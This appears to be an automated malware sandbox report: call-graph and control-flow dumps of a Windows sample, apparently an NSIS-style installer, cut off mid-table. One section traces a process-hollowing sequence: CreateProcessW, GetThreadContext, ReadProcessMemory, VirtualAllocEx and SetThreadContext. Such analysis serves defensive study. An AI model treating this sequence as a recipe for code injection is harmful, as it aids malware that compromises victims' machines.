4056->4109 4059->4036 4076 21a06c7 GetPEB 4060->4076 4062 21a1b35 4063 21a1b6b PathFileExistsW 4062->4063 4064 21a1b80 CreateDirectoryW 4063->4064 4065 21a1a21 4063->4065 4064->4065 4065->4037 4066 21a1b9b 4065->4066 4077 21a06c7 GetPEB 4066->4077 4068 21a1c01 4069 21a1c87 PathFileExistsW 4068->4069 4070 21a1ca2 CreateFileW 4069->4070 4075 21a1c95 4069->4075 4071 21a1cca 4070->4071 4070->4075 4072 21a1ce2 VirtualAlloc 4071->4072 4071->4075 4073 21a1d02 ReadFile 4072->4073 4072->4075 4074 21a1d1c FindCloseChangeNotification CreateFileW WriteFile 4073->4074 4073->4075 4074->4075 4075->4041 4076->4062 4077->4068 4078->4047 4118 21a06c7 GetPEB 4079->4118 4081 21a12dd 4082 21a140b CreateProcessW 4081->4082 4099 21a13e6 4081->4099 4083 21a1422 GetThreadContext 4082->4083 4082->4099 4084 21a1445 ReadProcessMemory 4083->4084 4083->4099 4085 21a1469 4084->4085 4084->4099 4086 21a149c VirtualAllocEx 4085->4086 4119 21a0368 4085->4119 4087 21a14c6 4086->4087 4086->4099 4088 21a0267 11 API calls 4087->4088 4091 21a14dc 4088->4091 4090 21a1490 4090->4086 4090->4099 4092 21a1536 4091->4092 4093 21a0267 11 API calls 4091->4093 4091->4099 4094 21a0267 11 API calls 4092->4094 4093->4091 4095 21a1550 4094->4095 4096 21a1559 SetThreadContext 4095->4096 4095->4099 4097 21a157e 4096->4097 4096->4099 4098 21a01b6 11 API calls 4097->4098 4098->4099 4099->4058 4101 21a0282 4100->4101 4102 21a0706 GetPEB 4101->4102 4103 21a02a3 4102->4103 4104 21a02ab 4103->4104 4105 21a0335 4103->4105 4106 21a0402 10 API calls 4104->4106 4153 21a0180 4105->4153 4108 21a031c 4106->4108 4108->4053 4110 21a01d1 4109->4110 4111 21a0706 GetPEB 4110->4111 4112 21a01f2 4111->4112 4113 21a023c 4112->4113 4114 21a01f6 4112->4114 4156 21a0192 4113->4156 4115 21a0402 10 API calls 4114->4115 4117 21a0231 4115->4117 4117->4058 4118->4081 4120 21a037b 4119->4120 4128 21a0706 GetPEB 4120->4128 4122 21a039c 4123 21a03a0 4122->4123 4124 21a03e6 4122->4124 4130 21a0402 GetPEB 4123->4130 4144 21a01a4 4124->4144 4127 21a03db 4127->4090 4129 21a0729 4128->4129 4129->4122 4131 21a0467 4130->4131 4147 21a0744 GetPEB 4131->4147 4134 21a04ec 4135 21a04fd VirtualAlloc 4134->4135 4138 21a05c2 4134->4138 4136 21a0513 ReadFile 4135->4136 4135->4138 4137 21a0528 VirtualAlloc 4136->4137 4136->4138 4137->4138 4141 21a0549 4137->4141 4139 21a060b 4138->4139 4140 21a0600 VirtualFree 4138->4140 4139->4127 4140->4139 4141->4138 4142 21a05b1 FindCloseChangeNotification 4141->4142 4143 21a05b5 VirtualFree 4141->4143 4142->4143 4143->4138 4145 21a0402 10 API calls 4144->4145 4146 21a01ae 4145->4146 4146->4127 4148 21a0757 4147->4148 4150 21a04db CreateFileW 4148->4150 4151 21a0616 GetPEB 4148->4151 4150->4134 4150->4138 4152 21a0641 4151->4152 4152->4148 4154 21a0402 10 API calls 4153->4154 4155 21a018a 4154->4155 4155->4108 4157 21a0402 10 API calls 4156->4157 4158 21a019c 4157->4158 4158->4117 4634 402607 4635 40260a 4634->4635 4637 402622 4634->4637 4636 402617 FindNextFileA 4635->4636 4636->4637 4638 402661 4636->4638 4640 405a85 lstrcpynA 4638->4640 4640->4637 4159 401389 4161 401390 4159->4161 4160 4013fe 4161->4160 4162 4013cb MulDiv SendMessageA 4161->4162 4162->4161 4912 401c8a 4913 4029cb 18 API calls 4912->4913 4914 401c91 4913->4914 4915 4029cb 18 API calls 4914->4915 4916 401c99 GetDlgItem 4915->4916 4917 4024aa 4916->4917 4918 40248e 4919 4029e8 18 API calls 4918->4919 4920 402495 4919->4920 4923 40575c GetFileAttributesA CreateFileA 4920->4923 4922 4024a1 4923->4922 4648 402012 4649 4029e8 18 API calls 4648->4649 4650 402019 4649->4650 4651 4029e8 18 API calls 4650->4651 4652 402023 4651->4652 4653 4029e8 18 API calls 4652->4653 4654 40202c 4653->4654 4655 4029e8 18 API calls 4654->4655 4656 402036 4655->4656 4657 4029e8 18 API calls 4656->4657 4659 402040 4657->4659 4658 402054 CoCreateInstance 4661 402129 4658->4661 4664 402073 4658->4664 4659->4658 4660 4029e8 18 API calls 4659->4660 4660->4658 4662 401423 25 API calls 4661->4662 4663 40215b 4661->4663 4662->4663 4664->4661 4665 402108 MultiByteToWideChar 4664->4665 4665->4661 4666 402215 4667 402223 4666->4667 4668 40221d 4666->4668 4670 4029e8 18 API calls 4667->4670 4671 402233 4667->4671 4669 4029e8 18 API calls 4668->4669 4669->4667 4670->4671 4672 4029e8 18 API calls 4671->4672 4674 402241 4671->4674 4672->4674 4673 4029e8 18 API calls 4675 40224a WritePrivateProfileStringA 4673->4675 4674->4673 4924 401e95 4925 4029e8 18 API calls 4924->4925 4926 401e9c 4925->4926 4927 405d7c 2 API calls 4926->4927 4928 401ea2 4927->4928 4930 401eb4 4928->4930 4931 4059e3 wsprintfA 4928->4931 4931->4930 4932 401595 4933 4029e8 18 API calls 4932->4933 4934 40159c SetFileAttributesA 4933->4934 4935 4015ae 4934->4935 4936 401d95 4937 4029cb 18 API calls 4936->4937 4938 401d9b 4937->4938 4939 4029cb 18 API calls 4938->4939 4940 401da4 4939->4940 4941 401db6 EnableWindow 4940->4941 4942 401dab ShowWindow 4940->4942 4943 40287d 4941->4943 4942->4943 4944 401696 4945 4029e8 18 API calls 4944->4945 4946 40169c GetFullPathNameA 4945->4946 4947 4016b3 4946->4947 4948 4016d4 4946->4948 4947->4948 4951 405d7c 2 API calls 4947->4951 4949 4016e8 GetShortPathNameA 4948->4949 4950 40287d 4948->4950 4949->4950 4952 4016c4 4951->4952 4952->4948 4954 405a85 lstrcpynA 4952->4954 4954->4948 4676 402419 4686 402af2 4676->4686 4678 402423 4679 4029cb 18 API calls 4678->4679 4680 40242c 4679->4680 4681 402443 RegEnumKeyA 4680->4681 4682 40244f RegEnumValueA 4680->4682 4684 40264e 4680->4684 4683 402468 RegCloseKey 4681->4683 4682->4683 4682->4684 4683->4684 4687 4029e8 18 API calls 4686->4687 4688 402b0b 4687->4688 4689 402b19 RegOpenKeyExA 4688->4689 4689->4678 4962 402299 4963 4022c9 4962->4963 4964 40229e 4962->4964 4966 4029e8 18 API calls 4963->4966 4965 402af2 19 API calls 4964->4965 4967 4022a5 4965->4967 4968 4022d0 4966->4968 4969 4029e8 18 API calls 4967->4969 4972 4022e6 4967->4972 4973 402a28 RegOpenKeyExA 4968->4973 4971 4022b6 RegDeleteValueA RegCloseKey 4969->4971 4971->4972 4974 402a53 4973->4974 4981 402a9f 4973->4981 4975 402a79 RegEnumKeyA 4974->4975 4976 402a8b RegCloseKey 4974->4976 4977 402ab0 RegCloseKey 4974->4977 4979 402a28 3 API calls 4974->4979 4975->4974 4975->4976 4978 405da3 3 API calls 4976->4978 4977->4981 4980 402a9b 4978->4980 4979->4974 4980->4981 4982 402acb RegDeleteKeyA 4980->4982 4981->4972 4982->4981 4690 401e1b 4691 4029e8 18 API calls 4690->4691 4692 401e21 4691->4692 4693 404e23 25 API calls 4692->4693 4694 401e2b 4693->4694 4695 4052e5 2 API calls 4694->4695 4698 401e31 4695->4698 4696 401e87 CloseHandle 4700 40264e 4696->4700 4697 401e50 WaitForSingleObject 4697->4698 4699 401e5e GetExitCodeProcess 4697->4699 4698->4696 4698->4697 4698->4700 4701 405ddc 2 API calls 4698->4701 4702 401e70 4699->4702 4703 401e79 4699->4703 4701->4697 4705 4059e3 wsprintfA 4702->4705 4703->4696 4705->4703 4706 401d1b GetDC GetDeviceCaps 4707 4029cb 18 API calls 4706->4707 4708 401d37 MulDiv 4707->4708 4709 4029cb 18 API calls 4708->4709 4710 401d4c 4709->4710 4711 405aa7 18 API calls 4710->4711 4712 401d85 CreateFontIndirectA 4711->4712 4713 4024aa 4712->4713 3556 401721 3557 4029e8 18 API calls 3556->3557 3558 401728 3557->3558 3562 40578b 3558->3562 3560 40172f 3561 40578b 2 API calls 3560->3561 3561->3560 3563 405796 GetTickCount GetTempFileNameA 3562->3563 3564 4057c2 3563->3564 3565 4057c6 3563->3565 3564->3563 3564->3565 3565->3560 4983 4023a1 4984 402af2 19 API calls 4983->4984 4985 4023ab 4984->4985 4986 4029e8 18 API calls 4985->4986 4987 4023b4 4986->4987 4988 4023be RegQueryValueExA 4987->4988 4992 40264e 4987->4992 4989 4023e4 RegCloseKey 4988->4989 4990 4023de 4988->4990 4989->4992 4990->4989 4994 4059e3 wsprintfA 4990->4994 4994->4989 4714 401922 4715 4029e8 18 API calls 4714->4715 4716 401929 lstrlenA 4715->4716 4717 4024aa 4716->4717 3705 403225 #17 SetErrorMode OleInitialize 3775 405da3 GetModuleHandleA 3705->3775 3709 403293 GetCommandLineA 3780 405a85 lstrcpynA 3709->3780 3711 4032a5 GetModuleHandleA 3712 4032bc 3711->3712 3713 4055a3 CharNextA 3712->3713 3714 4032d0 CharNextA 3713->3714 3719 4032dd 3714->3719 3715 403346 3716 403359 GetTempPathA 3715->3716 3781 4031f1 3716->3781 3718 40336f 3720 403393 DeleteFileA 3718->3720 3721 403373 GetWindowsDirectoryA lstrcatA 3718->3721 3719->3715 3722 4055a3 CharNextA 3719->3722 3726 403348 3719->3726 3789 402c5b GetTickCount GetModuleFileNameA 3720->3789 3723 4031f1 11 API calls 3721->3723 3722->3719 3725 40338f 3723->3725 3725->3720 3770 40340d 3725->3770 3874 405a85 lstrcpynA 3726->3874 3727 4033a4 3731 4055a3 CharNextA 3727->3731 3762 4033fd 3727->3762 3727->3770 3733 4033bb 3731->3733 3741 4033d8 3733->3741 3742 40343c lstrcatA lstrcmpiA 3733->3742 3734 403426 3736 405346 MessageBoxIndirectA 3734->3736 3735 40350b 3737 40358e ExitProcess 3735->3737 3739 405da3 3 API calls 3735->3739 3738 403434 ExitProcess 3736->3738 3743 40351a 3739->3743 3875 405659 3741->3875 3745 403458 CreateDirectoryA SetCurrentDirectoryA 3742->3745 3742->3770 3746 405da3 3 API calls 3743->3746 3748 40347a 3745->3748 3749 40346f 3745->3749 3750 403523 3746->3750 3899 405a85 lstrcpynA 3748->3899 3898 405a85 lstrcpynA 3749->3898 3753 405da3 3 API calls 3750->3753 3754 40352c 3753->3754 3756 40357a ExitWindowsEx 3754->3756 3761 40353a GetCurrentProcess 3754->3761 3756->3737 3760 403587 3756->3760 3757 4033f2 3890 405a85 lstrcpynA 3757->3890 3759 405aa7 18 API calls 3763 4034aa DeleteFileA 3759->3763 3929 40140b 3760->3929 3766 40354a 3761->3766 3819 4035e3 3762->3819 3765 4034b7 CopyFileA 3763->3765 3772 403488 3763->3772 3765->3772 3766->3756 3767 4034ff 3768 4057d3 38 API calls 3767->3768 3768->3770 3891 4035a6 3770->3891 3771 405aa7 18 API calls 3771->3772 3772->3759 3772->3767 3772->3771 3774 4034eb CloseHandle 3772->3774 3900 4057d3 3772->3900 3926 4052e5 CreateProcessA 3772->3926 3774->3772 3776 405dca GetProcAddress 3775->3776 3777 405dbf LoadLibraryA 3775->3777 3778 403268 SHGetFileInfoA 3776->3778 3777->3776 3777->3778 3779 405a85 lstrcpynA 3778->3779 3779->3709 3780->3711 3782 405ce3 5 API calls 3781->3782 3783 4031fd 3782->3783 3784 403207 3783->3784 3785 405578 3 API calls 3783->3785 3784->3718 3786 40320f CreateDirectoryA 3785->3786 3787 40578b 2 API calls 3786->3787 3788 403223 3787->3788 3788->3718 3932 40575c GetFileAttributesA CreateFileA 3789->3932 3791 402c9e 3818 402cab 3791->3818 3933 405a85 lstrcpynA 3791->3933 3793 402cc1 3934 4055bf lstrlenA 3793->3934 3797 402cd2 GetFileSize 3798 402dd3 3797->3798 3800 402ce9 3797->3800 3799 402bc5 32 API calls 3798->3799 3801 402dda 3799->3801 3800->3798 3802 4031a8 ReadFile 3800->3802 3804 402e6e 3800->3804 3811 402bc5 32 API calls 3800->3811 3800->3818 3803 402e16 GlobalAlloc 3801->3803 3801->3818 3939 4031da SetFilePointer 3801->3939 3802->3800 3807 402e2d 3803->3807 3805 402bc5 32 API calls 3804->3805 3805->3818 3809 40578b 2 API calls 3807->3809 3808 402df7 3810 4031a8 ReadFile 3808->3810 3812 402e3e CreateFileA 3809->3812 3813 402e02 3810->3813 3811->3800 3814 402e78 3812->3814 3812->3818 3813->3803 3813->3818 3940 4031da SetFilePointer 3814->3940 3816 402e86 3817 402f01 47 API calls 3816->3817 3817->3818 3818->3727 3820 405da3 3 API calls 3819->3820 3821 4035f7 3820->3821 3822 4035fd 3821->3822 3823 40360f 3821->3823 3950 4059e3 wsprintfA 3822->3950 3824 40596c 3 API calls 3823->3824 3825 403630 3824->3825 3827 40364e lstrcatA 3825->3827 3829 40596c 3 API calls 3825->3829 3828 40360d 3827->3828 3941 403897 3828->3941 3829->3827 3832 405659 18 API calls 3833 403676 3832->3833 3834 4036ff 3833->3834 3836 40596c 3 API calls 3833->3836 3835 405659 18 API calls 3834->3835 3837 403705 3835->3837 3838 4036a2 3836->3838 3839 403715 LoadImageA 3837->3839 3840 405aa7 18 API calls 3837->3840 3838->3834 3843 4036be lstrlenA 3838->3843 3847 4055a3 CharNextA 3838->3847 3841 403740 RegisterClassA 3839->3841 3842 4037c9 3839->3842 3840->3839 3844 40377c SystemParametersInfoA CreateWindowExA 3841->3844 3845 4037d3 3841->3845 3846 40140b 2 API calls 3842->3846 3848 4036f2 3843->3848 3849 4036cc lstrcmpiA 3843->3849 3844->3842 3845->3770 3850 4037cf 3846->3850 3851 4036bc 3847->3851 3853 405578 3 API calls 3848->3853 3849->3848 3852 4036dc GetFileAttributesA 3849->3852 3850->3845 3856 403897 19 API calls 3850->3856 3851->3843 3855 4036e8 3852->3855 3854 4036f8 3853->3854 3951 405a85 lstrcpynA 3854->3951 3855->3848 3859 4055bf 2 API calls 3855->3859 3857 4037e0 3856->3857 3860 403864 3857->3860 3861 4037e8 ShowWindow LoadLibraryA 3857->3861 3859->3848 3952 404ef5 OleInitialize 3860->3952 3862 403807 LoadLibraryA 3861->3862 3863 40380e GetClassInfoA 3861->3863 3862->3863 3865 403822 GetClassInfoA RegisterClassA 3863->3865 3866 403838 DialogBoxParamA 3863->3866 3865->3866 3868 40140b 2 API calls 3866->3868 3867 40386a 3869 403886 3867->3869 3870 40386e 3867->3870 3872 403860 3868->3872 3871 40140b 2 API calls 3869->3871 3870->3845 3873 40140b 2 API calls 3870->3873 3871->3845 3872->3845 3873->3845 3874->3716 3967 405a85 lstrcpynA 3875->3967 3877 40566a 3878 40560c 4 API calls 3877->3878 3879 405670 3878->3879 3880 4033e3 3879->3880 3881 405ce3 5 API calls 3879->3881 3880->3770 3889 405a85 lstrcpynA 3880->3889 3887 405680 3881->3887 3882 4056ab lstrlenA 3883 4056b6 3882->3883 3882->3887 3884 405578 3 API calls 3883->3884 3886 4056bb GetFileAttributesA 3884->3886 3885 405d7c 2 API calls 3885->3887 3886->3880 3887->3880 3887->3882 3887->3885 3888 4055bf 2 API calls 3887->3888 3888->3882 3889->3757 3890->3762 3892 4035c1 3891->3892 3893 4035b7 CloseHandle 3891->3893 3894 4035d5 3892->3894 3895 4035cb CloseHandle 3892->3895 3893->3892 3968 4053aa 3894->3968 3895->3894 3898->3748 3899->3772 3901 405da3 3 API calls 3900->3901 3902 4057de 3901->3902 3903 40583b GetShortPathNameA 3902->3903 3906 405930 3902->3906 4011 40575c GetFileAttributesA CreateFileA 3902->4011 3905 405850 3903->3905 3903->3906 3905->3906 3908 405858 wsprintfA 3905->3908 3906->3772 3907 40581f CloseHandle GetShortPathNameA 3907->3906 3909 405833 3907->3909 3910 405aa7 18 API calls 3908->3910 3909->3903 3909->3906 3911 405880 3910->3911 4012 40575c GetFileAttributesA CreateFileA 3911->4012 3913 40588d 3913->3906 3914 40589c GetFileSize GlobalAlloc 3913->3914 3915 405929 CloseHandle 3914->3915 3916 4058ba ReadFile 3914->3916 3915->3906 3916->3915 3917 4058ce 3916->3917 3917->3915 4013 4056d1 lstrlenA 3917->4013 3920 4058e3 4018 405a85 lstrcpynA 3920->4018 3921 40593d 3923 4056d1 4 API calls 3921->3923 3924 4058f1 3923->3924 3925 405904 SetFilePointer WriteFile GlobalFree 3924->3925 3925->3915 3927 405320 3926->3927 3928 405314 CloseHandle 3926->3928 3927->3772 3928->3927 3930 401389 2 API calls 3929->3930 3931 401420 3930->3931 3931->3737 3932->3791 3933->3793 3935 4055cc 3934->3935 3936 4055d1 CharPrevA 3935->3936 3937 402cc7 3935->3937 3936->3935 3936->3937 3938 405a85 lstrcpynA 3937->3938 3938->3797 3939->3808 3940->3816 3942 4038ab 3941->3942 3959 4059e3 wsprintfA 3942->3959 3944 40391c 3945 405aa7 18 API calls 3944->3945 3946 403928 SetWindowTextA 3945->3946 3947 403944 3946->3947 3948 40365e 3946->3948 3947->3948 3949 405aa7 18 API calls 3947->3949 3948->3832 3949->3947 3950->3828 3951->3834 3960 403e83 3952->3960 3954 404f18 3958 404f3f 3954->3958 3963 401389 3954->3963 3955 403e83 SendMessageA 3956 404f51 OleUninitialize 3955->3956 3956->3867 3958->3955 3959->3944 3961 403e9b 3960->3961 3962 403e8c SendMessageA 3960->3962 3961->3954 3962->3961 3965 401390 3963->3965 3964 4013fe 3964->3954 3965->3964 3966 4013cb MulDiv SendMessageA 3965->3966 3966->3965 3967->3877 3969 405659 18 API calls 3968->3969 3970 4053be 3969->3970 3971 4053c7 DeleteFileA 3970->3971 3972 4053de 3970->3972 3973 403416 OleUninitialize 3971->3973 3975 40551d 3972->3975 4009 405a85 lstrcpynA 3972->4009 3973->3734 3973->3735 3975->3973 3981 405d7c 2 API calls 3975->3981 3976 405408 3977 405419 3976->3977 3978 40540c lstrcatA 3976->3978 3980 4055bf 2 API calls 3977->3980 3979 40541f 3978->3979 3982 40542d lstrcatA 3979->3982 3984 405438 lstrlenA FindFirstFileA 3979->3984 3980->3979 3983 405538 3981->3983 3982->3984 3983->3973 3985 405578 3 API calls 3983->3985 3986 405513 3984->3986 4006 40545c 3984->4006 3987 405542 3985->3987 3986->3975 3989 40573d 2 API calls 3987->3989 3988 4055a3 CharNextA 3988->4006 3990 405548 RemoveDirectoryA 3989->3990 3991 405553 3990->3991 3992 40556a 3990->3992 3991->3973 3995 405559 3991->3995 3996 404e23 25 API calls 3992->3996 3993 4054f2 FindNextFileA 3997 40550a FindClose 3993->3997 3993->4006 3998 404e23 25 API calls 3995->3998 3996->3973 3997->3986 3999 405561 3998->3999 4000 4057d3 38 API calls 3999->4000 4003 405568 4000->4003 4001 40573d 2 API calls 4004 4054bf DeleteFileA 4001->4004 4002 4053aa 59 API calls 4002->4006 4003->3973 4004->4006 4005 404e23 25 API calls 4005->3993 4006->3988 4006->3993 4006->4001 4006->4002 4006->4005 4007 404e23 25 API calls 4006->4007 4008 4057d3 38 API calls 4006->4008 4010 405a85 lstrcpynA 4006->4010 4007->4006 4008->4006 4009->3976 4010->4006 4011->3907 4012->3913 4014 405707 lstrlenA 4013->4014 4015 405711 4014->4015 4016 4056e5 lstrcmpiA 4014->4016 4015->3920 4015->3921 4016->4015 4017 4056fe CharNextA 4016->4017 4017->4014 4018->3924 4995 401ca5 4996 4029cb 18 API calls 4995->4996 4997 401cb5 SetWindowLongA 4996->4997 4998 40287d 4997->4998 4718 401a26 4719 4029cb 18 API calls 4718->4719 4720 401a2c 4719->4720 4721 4029cb 18 API calls 4720->4721 4722 4019d6 4721->4722 4999 4045aa 5000 4045d6 4999->5000 5001 4045ba 4999->5001 5003 404609 5000->5003 5004 4045dc SHGetPathFromIDListA 5000->5004 5010 40532a GetDlgItemTextA 5001->5010 5006 4045f3 SendMessageA 5004->5006 5007 4045ec 5004->5007 5005 4045c7 SendMessageA 5005->5000 5006->5003 5008 40140b 2 API calls 5007->5008 5008->5006 5010->5005 4723 402b2d 4724 402b55 4723->4724 4725 402b3c SetTimer 4723->4725 4726 402ba3 4724->4726 4727 402ba9 MulDiv 4724->4727 4725->4724 4728 402b63 wsprintfA SetWindowTextA SetDlgItemTextA 4727->4728 4728->4726 5011 401bad 5012 4029cb 18 API calls 5011->5012 5013 401bb4 5012->5013 5014 4029cb 18 API calls 5013->5014 5015 401bbe 5014->5015 5016 401bce 5015->5016 5017 4029e8 18 API calls 5015->5017 5018 401bde 5016->5018 5019 4029e8 18 API calls 5016->5019 5017->5016 5020 401be9 5018->5020 5021 401c2d 5018->5021 5019->5018 5023 4029cb 18 API calls 5020->5023 5022 4029e8 18 API calls 5021->5022 5024 401c32 5022->5024 5025 401bee 5023->5025 5026 4029e8 18 API calls 5024->5026 5027 4029cb 18 API calls 5025->5027 5028 401c3b FindWindowExA 5026->5028 5029 401bf7 5027->5029 5032 401c59 5028->5032 5030 401c1d SendMessageA 5029->5030 5031 401bff SendMessageTimeoutA 5029->5031 5030->5032 5031->5032 4730 40422e 4731 404264 4730->4731 4732 40423e 4730->4732 4734 403e9e 8 API calls 4731->4734 4733 403e37 19 API calls 4732->4733 4735 40424b SetDlgItemTextA 4733->4735 4736 404270 4734->4736 4735->4731 4737 402630 4738 4029e8 18 API calls 4737->4738 4739 402637 FindFirstFileA 4738->4739 4740 40265a 4739->4740 4741 40264a 4739->4741 4742 402661 4740->4742 4745 4059e3 wsprintfA 4740->4745 4746 405a85 lstrcpynA 4742->4746 4745->4742 4746->4741 5033 4024b0 5034 4024b5 5033->5034 5035 4024c6 5033->5035 5036 4029cb 18 API calls 5034->5036 5037 4029e8 18 API calls 5035->5037 5039 4024bc 5036->5039 5038 4024cd lstrlenA 5037->5038 5038->5039 5040 4024ec WriteFile 5039->5040 5041 40264e 5039->5041 5040->5041 3566 4015b3 3567 4029e8 18 API calls 3566->3567 3568 4015ba 3567->3568 3584 40560c CharNextA CharNextA 3568->3584 3570 40160a 3571 40162d 3570->3571 3572 40160f 3570->3572 3578 401423 25 API calls 3571->3578 3575 401423 25 API calls 3572->3575 3573 4055a3 CharNextA 3574 4015d0 CreateDirectoryA 3573->3574 3576 4015e5 GetLastError 3574->3576 3580 4015c2 3574->3580 3577 401616 3575->3577 3579 4015f2 GetFileAttributesA 3576->3579 3576->3580 3590 405a85 lstrcpynA 3577->3590 3583 40215b 3578->3583 3579->3580 3580->3570 3580->3573 3582 401621 SetCurrentDirectoryA 3582->3583 3585 405632 3584->3585 3586 405626 3584->3586 3588 4055a3 CharNextA 3585->3588 3589 40564f 3585->3589 3586->3585 3587 40562d CharNextA 3586->3587 3587->3589 3588->3585 3589->3580 3590->3582 3591 401734 3592 4029e8 18 API calls 3591->3592 3593 40173b 3592->3593 3594 401761 3593->3594 3595 401759 3593->3595 3646 405a85 lstrcpynA 3594->3646 3645 405a85 lstrcpynA 3595->3645 3598 40175f 3602 405ce3 5 API calls 3598->3602 3599 40176c 3647 405578 lstrlenA CharPrevA 3599->3647 3604 40177e 3602->3604 3607 401795 CompareFileTime 3604->3607 3608 401859 3604->3608 3609 401830 3604->3609 3612 405a85 lstrcpynA 3604->3612 3617 405aa7 18 API calls 3604->3617 3629 40575c GetFileAttributesA CreateFileA 3604->3629 3650 405d7c FindFirstFileA 3604->3650 3653 40573d GetFileAttributesA 3604->3653 3656 405346 3604->3656 3607->3604 3610 404e23 25 API calls 3608->3610 3611 404e23 25 API calls 3609->3611 3619 401845 3609->3619 3613 401863 3610->3613 3611->3619 3612->3604 3630 402f01 3613->3630 3616 40188a SetFileTime 3618 40189c FindCloseChangeNotification 3616->3618 3617->3604 3618->3619 3620 4018ad 3618->3620 3621 4018b2 3620->3621 3622 4018c5 3620->3622 3624 405aa7 18 API calls 3621->3624 3623 405aa7 18 API calls 3622->3623 3626 4018cd 3623->3626 3625 4018ba lstrcatA 3624->3625 3625->3626 3628 405346 MessageBoxIndirectA 3626->3628 3628->3619 3629->3604 3631 402f12 SetFilePointer 3630->3631 3632 402f2e 3630->3632 3631->3632 3660 40302c GetTickCount 3632->3660 3635 402f3f ReadFile 3636 402f5f 3635->3636 3644 401876 3635->3644 3637 40302c 42 API calls 3636->3637 3636->3644 3638 402f76 3637->3638 3639 402ff1 ReadFile 3638->3639 3642 402f86 3638->3642 3638->3644 3639->3644 3641 402fa1 ReadFile 3641->3642 3641->3644 3642->3641 3643 402fba WriteFile 3642->3643 3642->3644 3643->3642 3643->3644 3644->3616 3644->3618 3645->3598 3646->3599 3648 405592 lstrcatA 3647->3648 3649 401772 lstrcatA 3647->3649 3648->3649 3649->3598 3651 405d92 FindClose 3650->3651 3652 405d9d 3650->3652 3651->3652 3652->3604 3654 405759 3653->3654 3655 40574c SetFileAttributesA 3653->3655 3654->3604 3655->3654 3657 40535b 3656->3657 3658 4053a7 3657->3658 3659 40536f MessageBoxIndirectA 3657->3659 3658->3604 3659->3658 3661 403196 3660->3661 3662 40305b 3660->3662 3663 402bc5 32 API calls 3661->3663 3673 4031da SetFilePointer 3662->3673 3669 402f37 3663->3669 3665 403066 SetFilePointer 3670 40308b 3665->3670 3669->3635 3669->3644 3670->3669 3671 403120 WriteFile 3670->3671 3672 403177 SetFilePointer 3670->3672 3674 4031a8 ReadFile 3670->3674 3676 405e9d 3670->3676 3683 402bc5 3670->3683 3671->3669 3671->3670 3672->3661 3673->3665 3675 4031c9 3674->3675 3675->3670 3677 405ec2 3676->3677 3682 405eca 3676->3682 3677->3670 3678 405f51 GlobalFree 3679 405f5a GlobalAlloc 3678->3679 3679->3677 3679->3682 3680 405fd1 GlobalAlloc 3680->3677 3680->3682 3681 405fc8 GlobalFree 3681->3680 3682->3677 3682->3678 3682->3679 3682->3680 3682->3681 3684 402bd3 3683->3684 3685 402beb 3683->3685 3686 402be3 3684->3686 3687 402bdc DestroyWindow 3684->3687 3688 402bf3 3685->3688 3689 402bfb GetTickCount 3685->3689 3686->3670 3687->3686 3698 405ddc 3688->3698 3689->3686 3690 402c09 3689->3690 3692 402c11 3690->3692 3693 402c3e CreateDialogParamA 3690->3693 3692->3686 3702 402ba9 3692->3702 3693->3686 3695 402c1f wsprintfA 3696 404e23 25 API calls 3695->3696 3697 402c3c 3696->3697 3697->3686 3699 405df9 PeekMessageA 3698->3699 3700 405e09 3699->3700 3701 405def DispatchMessageA 3699->3701 3700->3686 3701->3699 3703 402bb8 3702->3703 3704 402bba MulDiv 3702->3704 3703->3704 3704->3695 4754 401634 4755 4029e8 18 API calls 4754->4755 4756 40163a 4755->4756 4757 405d7c 2 API calls 4756->4757 4758 401640 4757->4758 4759 401934 4760 4029cb 18 API calls 4759->4760 4761 40193b 4760->4761 4762 4029cb 18 API calls 4761->4762 4763 401945 4762->4763 4764 4029e8 18 API calls 4763->4764 4765 40194e 4764->4765 4766 401961 lstrlenA 4765->4766 4767 40199c 4765->4767 4768 40196b 4766->4768 4768->4767 4772 405a85 lstrcpynA 4768->4772 4770 401985 4770->4767 4771 401992 lstrlenA 4770->4771 4771->4767 4772->4770 5042 4019b5 5043 4029e8 18 API calls 5042->5043 5044 4019bc 5043->5044 5045 4029e8 18 API calls 5044->5045 5046 4019c5 5045->5046 5047 4019cc lstrcmpiA 5046->5047 5048 4019de lstrcmpA 5046->5048 5049 4019d2 5047->5049 5048->5049 5050 4014b7 5051 4014bd 5050->5051 5052 401389 2 API calls 5051->5052 5053 4014c5 5052->5053 5054 4025be 5055 4025c5 5054->5055 5056 40282a 5054->5056 5057 4029cb 18 API calls 5055->5057 5058 4025d0 5057->5058 5059 4025d7 SetFilePointer 5058->5059 5059->5056 5060 4025e7 5059->5060 5062 4059e3 wsprintfA 5060->5062 5062->5056

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 403225-4032ba #17 SetErrorMode OleInitialize call 405da3 SHGetFileInfoA call 405a85 GetCommandLineA call 405a85 GetModuleHandleA 7 4032c6-4032db call 4055a3 CharNextA 0->7 8 4032bc-4032c1 0->8 11 403340-403344 7->11 8->7 12 403346 11->12 13 4032dd-4032e0 11->13 16 403359-403371 GetTempPathA call 4031f1 12->16 14 4032e2-4032e6 13->14 15 4032e8-4032f0 13->15 14->14 14->15 18 4032f2-4032f3 15->18 19 4032f8-4032fb 15->19 25 403393-4033aa DeleteFileA call 402c5b 16->25 26 403373-403391 GetWindowsDirectoryA lstrcatA call 4031f1 16->26 18->19 20 403330-40333d call 4055a3 19->20 21 4032fd-403301 19->21 20->11 38 40333f 20->38 23 403311-403317 21->23 24 403303-40330c 21->24 30 403327-40332e 23->30 31 403319-403322 23->31 24->23 28 40330e 24->28 39 403411-403420 call 4035a6 OleUninitialize 25->39 40 4033ac-4033b2 25->40 26->25 26->39 28->23 30->20 36 403348-403354 call 405a85 30->36 31->30 35 403324 31->35 35->30 36->16 38->11 50 403426-403436 call 405346 ExitProcess 39->50 51 40350b-403511 39->51 42 403401-403408 call 4035e3 40->42 43 4033b4-4033bd call 4055a3 40->43 48 40340d 42->48 55 4033c8-4033ca 43->55 48->39 53 403513-403530 call 405da3 * 3 51->53 54 40358e-403596 51->54 80 403532-403534 53->80 81 40357a-403585 ExitWindowsEx 53->81 60 403598 54->60 61 40359c-4035a0 ExitProcess 54->61 56 4033cc-4033d6 55->56 57 4033bf-4033c5 55->57 62 4033d8-4033e5 call 405659 56->62 63 40343c-403456 lstrcatA lstrcmpiA 56->63 57->56 65 4033c7 57->65 60->61 62->39 73 4033e7-4033fd call 405a85 * 2 62->73 63->39 67 403458-40346d CreateDirectoryA SetCurrentDirectoryA 63->67 65->55 70 40347a-403494 call 405a85 67->70 71 40346f-403475 call 405a85 67->71 83 403499-4034b5 call 405aa7 DeleteFileA 70->83 71->70 73->42 80->81 84 